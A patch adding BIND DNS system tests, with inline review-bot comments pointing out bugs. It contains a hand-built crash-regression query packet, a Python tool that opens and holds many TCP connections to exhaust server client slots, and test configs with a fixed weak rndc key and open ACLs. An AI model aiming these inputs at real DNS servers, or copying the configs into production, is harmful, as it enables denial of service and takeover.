+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+
+(
+ cd ns1
+ $SHELL sign.sh
+)
diff --git a/bin/tests/system/synthfromdnssec/tests.sh b/bin/tests/system/synthfromdnssec/tests.sh
new file mode 100644
index 0000000..95cfc60
--- /dev/null
+++ b/bin/tests/system/synthfromdnssec/tests.sh
@@ -0,0 +1,202 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +status=0 +n=1 + +rm -f dig.out.* + +dig_with_opts() { + "$DIG" +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +} + +for ns in 2 4 5 +do + case $ns in + 2) description="<default>";; + 4) description="no";; + 5) description="yes";; + *) exit 1;; + esac + echo_i "prime negative NXDOMAIN response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts a.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NXDOMAIN," dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + [ $ns -eq ${ns} ] && nxdomain=dig.out.ns${ns}.test$n + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "prime negative NODATA response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts nodata.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + [ $ns -eq 2 ] && nodata=dig.out.ns${ns}.test$n + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "prime wildcard response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts a.wild-a.example. 
@10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "a.wild-a.example.*3600.IN.A" dig.out.ns${ns}.test$n > /dev/null || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "prime wildcard CNAME response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts a.wild-cname.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "a.wild-cname.example.*3600.IN.CNAME" dig.out.ns${ns}.test$n > /dev/null || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +done + +echo_i "prime redirect response (+nodnssec) (synth-from-dnssec <default>;) ($n)" +ret=0 +dig_with_opts +nodnssec a.redirect. @10.53.0.3 a > dig.out.ns2.test$n || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR," dig.out.ns2.test$n > /dev/null || ret=1 +grep 'a\.redirect\..*300.IN.A.100\.100\.100\.2' dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# ensure TTL of synthesised answers differs from direct answers. +# +sleep 1 + +for ns in 2 4 5 +do + case $ns in + 2) synth=no description="<default>";; + 4) synth=no description="no";; + 5) synth=yes description="yes";; + *) exit 1;; + esac + echo_i "check synthesized NXDOMAIN response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts b.example. 
@10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NXDOMAIN," dig.out.ns${ns}.test$n > /dev/null || ret=1 + if [ ${synth} = yes ] + then + grep "example.*IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null && ret=1 + else + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + fi + digcomp $nxdomain dig.out.ns${ns}.test$n || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "check synthesized NODATA response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts nodata.example. @10.53.0.${ns} aaaa > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + if [ ${synth} = yes ] + then + grep "example.*IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null && ret=1 + else + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + fi + digcomp $nodata dig.out.ns${ns}.test$n || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "check synthesized wildcard response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts b.wild-a.example. 
@10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + if [ ${synth} = yes ] + then + grep "b\.wild-a\.example\..*IN.A" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "b\.wild-a\.example\..*3600.IN.A" dig.out.ns${ns}.test$n > /dev/null && ret=1 + else + grep "b\.wild-a\.example\..*3600.IN.A" dig.out.ns${ns}.test$n > /dev/null || ret=1 + fi + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "check synthesized wildcard CNAME response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts b.wild-cname.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + if [ ${synth} = yes ] + then + grep "b.wild-cname.example.*IN.CNAME" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "b.wild-cname.example.*3600.IN.CNAME" dig.out.ns${ns}.test$n > /dev/null && ret=1 + else + grep "b.wild-cname.example.*3600.IN.CNAME" dig.out.ns${ns}.test$n > /dev/null || ret=1 + fi + grep "ns1.example.*.IN.A" dig.out.ns${ns}.test$n > /dev/null || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +done + +echo_i "check redirect response (+dnssec) (synth-from-dnssec <default>;) ($n)" +ret=0 +dig_with_opts b.redirect. @10.53.0.3 a > dig.out.ns2.test$n || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.ns2.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN," dig.out.ns2.test$n > /dev/null || ret=1 +grep "\..*3600.IN.SOA" dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "check redirect response (+nodnssec) (synth-from-dnssec <default>;) ($n)" +ret=0 +dig_with_opts +nodnssec b.redirect. 
@10.53.0.3 a > dig.out.ns2.test$n || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR," dig.out.ns2.test$n > /dev/null || ret=1 +grep 'b\.redirect\..*300.IN.A.100\.100\.100\.2' dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +echo_i "check DNAME handling (synth-from-dnssec yes;) ($n)" +ret=0 +dig_with_opts dnamed.example. ns @10.53.0.5 > dig.out.ns5.test$n || ret=1 +dig_with_opts a.dnamed.example. a @10.53.0.5 > dig.out.ns5-1.test$n || ret=1 +grep "status: NOERROR," dig.out.ns5-1.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/system-test-driver.sh b/bin/tests/system/system-test-driver.sh new file mode 100755 index 0000000..cf4d5f2 --- /dev/null +++ b/bin/tests/system/system-test-driver.sh 
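Review bot: The guard `[ $ns -eq ${ns} ] && nxdomain=dig.out.ns${ns}.test$n` in the NXDOMAIN priming step of the first loop is always true, so `nxdomain` is overwritten on every pass and ends up naming the ns5 output, whereas the matching NODATA step pins its reference with `[ $ns -eq 2 ]`. The later `digcomp $nxdomain dig.out.ns${ns}.test$n` therefore compares against the server configured with `synth-from-dnssec yes` rather than the default one; presumably the line was meant to read `[ $ns -eq 2 ] && nxdomain=dig.out.ns${ns}.test$n`. The three redirect checks also query `@10.53.0.3` but write to `dig.out.ns2.test$n`, which makes a failure harder to trace; `dig.out.ns3.test$n` would match the server being asked.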
@@ -0,0 +1,80 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck disable=SC2181 +# shellcheck disable=SC2034 + +usage() { + echo "$0 --test-name=NAME --log-file=PATH.log --trs-file=PATH.trs --color-tests={yes|no} --expect-failure={yes|no} --enable-hard-errors={yes|no}" +} + +# +# This requires GNU getopt +# +getopt --test >/dev/null +if [ "$?" -ne 4 ]; then + echo "fatal: GNU getopt is required" + exit 1 +fi + +OPTS=$(getopt --shell "sh" --name "$(basename "$0")" --options '' --longoptions test-name:,log-file:,trs-file:,color-tests:,expect-failure:,enable-hard-errors: -- "$@") + +if [ "$?" != 0 ] ; then echo "Failed parsing options." 
>&2 ; exit 1 ; fi + +eval set -- "$OPTS" + +TEST_NAME= +LOG_FILE= +TRS_FILE= +COLOR_TESTS=yes +EXPECT_FAILURE=no +HARD_ERRORS=yes + +while true; do + case "$1" in + --test-name ) TEST_NAME="$2"; shift; shift ;; + --log-file ) LOG_FILE="$2"; shift; shift ;; + --trs-file ) TRS_FILE="$2"; shift; shift ;; + --color-tests ) COLOR_TESTS="$2"; shift; shift ;; + --expect-failure ) EXPECT_FAILURE="$2"; shift; shift ;; + --hard-errors ) HARD_ERRORS="$2"; shift; shift ;; + -- ) shift; break ;; + *) break ;; + esac +done + +if [ -z "$1" ]; then + echo "fatal: test name required" + usage + exit 1 +fi + +TEST_PROGRAM="$1" +shift + +if [ -z "$TEST_NAME" ]; then + TEST_NAME="$(basename "$TEST_PROGRAM")" +fi +if [ -z "$LOG_FILE" ]; then + LOG_FILE="$TEST_PROGRAM.log" +fi +if [ -z "$TRS_FILE" ]; then + TRS_FILE="$TEST_PROGRAM.trs" +fi + +echo "Running $TEST_PROGRAM" + +random=$(awk 'BEGIN { srand(); print int(rand()*32768) }' /dev/null) +./run.sh -p "$((random%32000+32000))" "$@" "$TEST_PROGRAM" + +exit $? diff --git a/bin/tests/system/tcp/1996-alloc_dnsbuf-crash-test.pkt b/bin/tests/system/tcp/1996-alloc_dnsbuf-crash-test.pkt new file mode 100644 index 0000000..7520c3a --- /dev/null +++ b/bin/tests/system/tcp/1996-alloc_dnsbuf-crash-test.pkt @@ -0,0 +1,12 @@ +# Transaction ID +0001 +# Standard query +0000 +# Questions: 1, Additional: 1 +0001 0000 0000 0000 +# QNAME: www.isc.org +03 697363 03 6F7267 00 +# Type: AXFR +00fc +# Class: IN +0001 diff --git a/bin/tests/system/tcp/ans6/ans.py b/bin/tests/system/tcp/ans6/ans.py new file mode 100644 index 0000000..4595ddc --- /dev/null +++ b/bin/tests/system/tcp/ans6/ans.py 
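Review bot: `--enable-hard-errors` is declared in the `getopt` long-option list and shown by `usage`, but the `case` in system-test-driver.sh only has an arm for `--hard-errors`, so the documented option falls through to `*) break ;;` and the option string itself is then taken as `TEST_PROGRAM`. The arm should read `--enable-hard-errors ) HARD_ERRORS="$2"; shift; shift ;;`. Separately, `srand()` without an argument seeds from the time of day in POSIX awk, so drivers launched within the same second can compute the same `-p` port; mixing in the process id, for example `awk -v seed="$$" 'BEGIN { srand(seed); print int(rand()*32768) }'`, would presumably make collisions between parallel tests less likely.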
@@ -0,0 +1,157 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +############################################################################ +# +# This tool allows an arbitrary number of TCP connections to be made to the +# specified service and to keep them open until told otherwise. It is +# controlled by writing text commands to a TCP socket (default port: 5309). +# +# Currently supported commands: +# +# - open <COUNT> <HOST> <PORT> +# +# Opens <COUNT> TCP connections to <HOST>:<PORT> and keeps them open. +# <HOST> must be an IP address (IPv4 or IPv6). +# +# - close <COUNT> +# +# Close the oldest <COUNT> previously established connections. +# +############################################################################ + +from __future__ import print_function + +import datetime +import errno +import os +import select +import signal +import socket +import sys +import time + + +# Timeout for establishing all connections requested by a single 'open' command. +OPEN_TIMEOUT = 2 +VERSION_QUERY = b"\x00\x1e\xaf\xb8\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07version\x04bind\x00\x00\x10\x00\x03" + + +def log(msg): + print(datetime.datetime.now().strftime("%d-%b-%Y %H:%M:%S.%f ") + msg) + + +def open_connections(active_conns, count, host, port): + queued = [] + errors = [] + + try: + socket.inet_aton(host) + family = socket.AF_INET + except socket.error: + family = socket.AF_INET6 + + log("Opening %d connections..." 
% count) + + for _ in range(count): + sock = socket.socket(family, socket.SOCK_STREAM) + sock.setblocking(0) + err = sock.connect_ex((host, port)) + if err not in (0, errno.EINPROGRESS): + log("%s on connect for socket %s" % (errno.errorcode[err], sock)) + errors.append(sock) + else: + queued.append(sock) + + start = time.time() + while queued: + now = time.time() + time_left = OPEN_TIMEOUT - (now - start) + if time_left <= 0: + break + _, wsocks, _ = select.select([], queued, [], time_left) + for sock in wsocks: + queued.remove(sock) + err = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) + if err: + log("%s for socket %s" % (errno.errorcode[err], sock)) + errors.append(sock) + else: + sock.send(VERSION_QUERY) + active_conns.append(sock) + + if errors: + log("result=FAIL: %d connection(s) failed" % len(errors)) + elif queued: + log("result=FAIL: Timed out, aborting %d pending connections" % len(queued)) + for sock in queued: + sock.close() + else: + log("result=OK: Successfully opened %d connections" % count) + + +def close_connections(active_conns, count): + log("Closing %s connections..." 
% "all" if count == 0 else str(count)) + if count == 0: + count = len(active_conns) + for _ in range(count): + sock = active_conns.pop(0) + sock.close() + log("result=OK: Successfully closed %d connections" % count) + + +def sigterm(*_): + log("SIGTERM received, shutting down") + os.remove("ans.pid") + sys.exit(0) + + +def main(): + active_conns = [] + + signal.signal(signal.SIGTERM, sigterm) + + with open("ans.pid", "w") as pidfile: + print(os.getpid(), file=pidfile) + + listenip = "10.53.0.6" + try: + port = int(os.environ["CONTROLPORT"]) + except KeyError: + port = 5309 + + log("Listening on %s:%d" % (listenip, port)) + + ctlsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ctlsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + ctlsock.bind((listenip, port)) + ctlsock.listen(1) + + while True: + (clientsock, _) = ctlsock.accept() + log("Accepted control connection from %s" % clientsock) + cmdline = clientsock.recv(512).decode("ascii").strip() + if cmdline: + log("Received command: %s" % cmdline) + cmd = cmdline.split() + if cmd[0] == "open": + count, host, port = cmd[1:] + open_connections(active_conns, int(count), host, int(port)) + elif cmd[0] == "close": + (count,) = cmd[1:] + close_connections(active_conns, int(count)) + else: + log("result=FAIL: Unknown command") + clientsock.close() + + +if __name__ == "__main__": + main() diff --git a/bin/tests/system/tcp/clean.sh b/bin/tests/system/tcp/clean.sh new file mode 100644 index 0000000..ae4cb25 --- /dev/null +++ b/bin/tests/system/tcp/clean.sh 
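Review bot: In `close_connections`, the log call `"Closing %s connections..." % "all" if count == 0 else str(count)` binds `%` before the conditional, so for any non-zero count only the bare number is logged; it should be `log("Closing %s connections..." % ("all" if count == 0 else str(count)))`. The same function calls `active_conns.pop(0)` without checking the list length, so a `close` for more connections than are open raises IndexError, and in `main` a malformed command (wrong argument count, non-numeric value, non-ASCII bytes) raises out of the accept loop and stops the tool. Wrapping the dispatch in `try`/`except (ValueError, IndexError, UnicodeDecodeError)` and logging `result=FAIL` would keep the control socket alive for the remaining test steps. In `open_connections`, sockets appended to `errors` are never closed, and pending ones in `queued` are skipped when `errors` is non-empty because of the `elif`.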
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f ans6/ans.run*
+rm -f dig.out*
+rm -f rndc.out*
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
+rm -f ns*/named.memstats
+rm -f ns*/named.run
+rm -f ns*/named.conf
+rm -f ns*/named.stats*
diff --git a/bin/tests/system/tcp/ns1/named.conf.in b/bin/tests/system/tcp/ns1/named.conf.in
new file mode 100644
index 0000000..24c8746
--- /dev/null
+++ b/bin/tests/system/tcp/ns1/named.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ statistics-file "named.stats";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/tcp/ns1/root.db b/bin/tests/system/tcp/ns1/root.db
new file mode 100644
index 0000000..17780d1
--- /dev/null
+++ b/bin/tests/system/tcp/ns1/root.db
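Review bot: The `controls` statement in ns1/named.conf.in accepts rndc from any address (`allow { any; }`) and authenticates it with the short fixed secret `1234abcd8765`; the same pair is repeated in the ns2, ns3, ns4, ns5 and ns7 named.conf.in files, and ns2 also sets `allow-update { any; }` on the `example` zone. That is tolerable only because each server listens on a 10.53.0.x test address, which the files never state. A leading comment such as `/* Test fixture only: fixed rndc key and open ACLs; do not reuse outside the system-test network. */` would keep these blocks from being copied into a real configuration.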
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/tcp/ns2/example.db b/bin/tests/system/tcp/ns2/example.db
new file mode 100644
index 0000000..4d60ce3
--- /dev/null
+++ b/bin/tests/system/tcp/ns2/example.db
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+
+$ORIGIN example.
+a A 10.0.0.1
+ MX 10 mail.example.
+
+mail A 10.0.0.2
diff --git a/bin/tests/system/tcp/ns2/named.conf.in b/bin/tests/system/tcp/ns2/named.conf.in
new file mode 100644
index 0000000..5737800
--- /dev/null
+++ b/bin/tests/system/tcp/ns2/named.conf.in
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ statistics-file "named.stats";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/tcp/ns3/named.conf.in b/bin/tests/system/tcp/ns3/named.conf.in
new file mode 100644
index 0000000..5b3b982
--- /dev/null
+++ b/bin/tests/system/tcp/ns3/named.conf.in
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+server 10.53.0.1 { tcp-only yes; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/tcp/ns4/named.conf.in b/bin/tests/system/tcp/ns4/named.conf.in
new file mode 100644
index 0000000..a7a0546
--- /dev/null
+++ b/bin/tests/system/tcp/ns4/named.conf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ forwarders { 10.53.0.2; };
+ forward only;
+};
+
+server 10.53.0.2 { tcp-only yes; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/tcp/ns5/named.conf.in b/bin/tests/system/tcp/ns5/named.conf.in
new file mode 100644
index 0000000..7827d9d
--- /dev/null
+++ b/bin/tests/system/tcp/ns5/named.conf.in
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ tcp-listen-queue 32;
+ recursion yes;
+ notify yes;
+ tcp-clients 17;
+ dnssec-validation no;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/tcp/ns7/named.conf.in b/bin/tests/system/tcp/ns7/named.conf.in
new file mode 100644
index 0000000..bf434d9
--- /dev/null
+++ b/bin/tests/system/tcp/ns7/named.conf.in
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.7;
+ notify-source 10.53.0.7;
+ transfer-source 10.53.0.7;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ statistics-file "named.stats";
+ tcp-clients 1;
+ keep-response-order { any; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/tcp/ns7/named.dropedns b/bin/tests/system/tcp/ns7/named.dropedns
new file mode 100644
index 0000000..37dd9cf
--- /dev/null
+++ b/bin/tests/system/tcp/ns7/named.dropedns
@@ -0,0 +1 @@
+dropedns
diff --git a/bin/tests/system/tcp/ns7/root.db b/bin/tests/system/tcp/ns7/root.db
new file mode 100644
index 0000000..bb31741
--- /dev/null
+++ b/bin/tests/system/tcp/ns7/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
